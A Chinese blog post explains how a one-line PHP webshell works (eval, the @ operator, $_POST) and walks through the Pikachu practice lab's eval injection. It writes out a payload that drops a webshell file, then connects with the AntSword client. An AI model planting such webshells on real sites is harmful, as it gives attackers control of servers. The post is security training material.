首页 > 其他分享 >一句话木马

一句话木马

时间:2023-05-25 21:34:02浏览次数:27  
标签:木马 一句 报错 eval POST php 上传

一句话木马原理:

利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['attack']表示从页面中获得attack这个参数值。

入侵条件:

(1)木马上传成功,未被杀;
(2)知道木马的路径在哪;
(3)上传的木马能正常运行。

evel()函数:括号里边的字符串会被当成php代码去执行

@表示无论后面的代码执行成功与否都不会报错

pikachu--REC--exec eval()

在输入框中输入phpinfo();发现phpinfo()函数被执行,对弹出相应的php信息

 

 

eval()函数的作用就是把括号内的内容当成php代码去执行。因此我们可以通过这个漏洞上传一句话木马:fputs(fopen('shell.php','w'),'<?php assert($_POST[fin]);?>');发现没有反应,只弹出了个“你喜欢的字符串还挺奇怪的!”语句,但是我们到文件的根目录下发现,文件已经被上传成功

 

 

 

使用蚁剑进行连接,连接成功后打开根目录下的原文件,发现直接把输入的语句放入eval()函数里当成php代码被执行,@后边的字符串无论正确与否都不会发生报错。(这里连接时我遇到了一点困难,就是一只连接不上,显示数据为空,因为我的url地址写错了,应该在pikachu网址下如下图所示,连接密码是shell.php文件里POST里的内容,POST里是fin,所以密码写fin)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

标签:木马,一句,报错,eval,POST,php,上传
From: https://www.cnblogs.com/caleb77/p/17432972.html

相关文章

  • Delphi XE2 新增 System.Zip 单元, 可用一句话压缩整个文件夹了
    单元内主要就是TZipFile类,最方便使用的是它的类方法:TZipFile.ExtractZipFile()   //解压Zip文件到指定文件夹TZipFile.IsValid()       //判断指定文件是否是有效的Zip文件TZipFile.ZipDirectoryContents()//压缩指定路径下的所有文件测试:u......
  • 主机服务器tmp目录报php病毒木马的解决方法
    Linux和Windows主机的tmp目录都是临时文件存放的目录,比如程序运行产生的临时文件和用户上传的临时文件都会在这个目录生成。有时候这个目录会产生病毒或木马程序,大部分都php病毒木马,这种情况一般是黑客利用网站程序漏洞上传了php病毒木马,或者是因为php.ini里面的upload_tmp_dir配......
  • 一句话搞懂字面量
    一句话等号右边为字面量inta=1;//a为变量,1为字面量publicstaticfinalintb=10;//b为常量,10为字面量stringstr=“helloworld!”;//str为变量,helloworld!为字面量术语在计算机科学中,字面量(literal)是用于表达源代码中一个固定值的表示法(notation)。几乎所有......
  • 【一句日历】2023年5月
    【2023年5月1日·星期一】工作是大自然的医生,人类幸福的源头。                                                 ——加伦【2023年5月2日·星期二】不要简单地相信直......
  • 【Unity】旋转木马
    对三角函数进行实际操作,需要对木马移动进行平滑插值木马起伏采用的Cos函数的周期实现usingSystem.Collections;usingSystem.Collections.Generic;usingUnityEngine;publicclassMerryGoRound:MonoBehaviour{publicTransformnode;publicfloatrudis;......
  • 一句话让人跳,一句话让人笑
        为了家庭和孩子升学,暂时回到内地,年龄原因,一时找不到工资高的工作,勉强找了个外包驻场“数据资源局”的工作,工资在不算低,我心理价位的75%,勉强够了。原打算到了今年6月份孩子中考完成就换工作走了。    现场真心没啥工作,很闲,一边学习一边备考PMP,考完后,这段时间就......
  • 加密木马分析
    前言记一次恶意代码分析教程:《恶意代码分析实战》第九章实验Lab9-1恶意代码样本:https://github.com/mikesiko/PracticalMalwareAnalysis-Labs 实验环境(虚拟环境)WindowsXP:Ollydbg1.1Windows10:IDApro7.7 定位调用main函数地址 IDA函数窗口找到_main,进入函......
  • 冰河木马测试分析
    冰河木马测试分析冰河木马原理冰河木马采用的是木马的传统连接技术,采用C/S运行模式,将客户端运行在攻击机上,将木马服务端植入到靶机上。当服务器端程序在目标计算机上被执行后,一般会打开一个默认的端口进行监听,当客户端向服务器端主动提出连接请求,服务器端的木马程序就会自动运行......
  • 【一句日历】2023年4月
    【2023年4月1日·星期六】你是一树一树的开花,是燕在梁间呢喃,——你是爱,是暖,是希望,你是人间的四月天!                                                 ——林徽因【2023......
  • 一句话讲明Hyper-V虚拟机如何上网
    最近研究Hyper-V,好像提问比较多的就是Hyper-V要上网怎么办 Hyper-V要上网,你就现在Hyper-V里面创建一个的switch,switch会在物理主机上创建一个虚拟网卡,虚拟网卡和物理网卡......